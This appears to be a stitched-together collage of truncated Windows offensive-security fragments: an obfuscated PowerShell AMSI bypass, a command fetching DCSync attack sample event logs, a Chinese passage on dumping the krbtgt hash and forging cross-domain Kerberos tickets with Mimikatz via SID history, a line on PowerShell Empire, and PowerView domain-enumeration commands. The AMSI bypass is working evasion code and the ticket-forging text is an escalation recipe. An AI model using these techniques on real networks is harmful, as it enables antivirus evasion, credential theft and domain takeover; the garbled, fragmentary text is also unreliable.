sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','
https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/raw/master/Credential%20Access/CA_DCSync_4662.evtx -OutFile C:\Users\sylvain.COSMOS\Desktop\CA_DCSync_4662.evtx Get-WinEvent -Path C:\Users\sylvain.COSMOS\Desktop\CA_DCSync_4662.evtx | ForEach-Object {$_ | Write-EventLogRecord -Channel 0...
从DC,使用 DCSync 或 LSADump 转储 krbtgt 哈希。然后,使用这个哈希,使用 Mimikatz 伪造一个跨域的 TGT,就像之前的方法一样。 这样做需要当前域的 SID 作为/sid参数,目标域的 SID 作为/sids参数的一部分。你可以使用 PowerView 的Get-DomainSID,使用*-516和S-1-5-9的SID历史记录(/SID)分别伪装为域控制器...
PowerShell Empire is a post-exploitation framework for computers and servers running Microsoft Windows, Windows Server operating systems, or both. In these...
Get-NetComputer # Get all domains in current forest Get-NetForestDomain # Get domain/forest trusts Get-NetDomainTrust Get-NetForestTrust # Get information for the DA group Get-NetGroup -GroupName "Domain Admins" # Find members of the DA group ...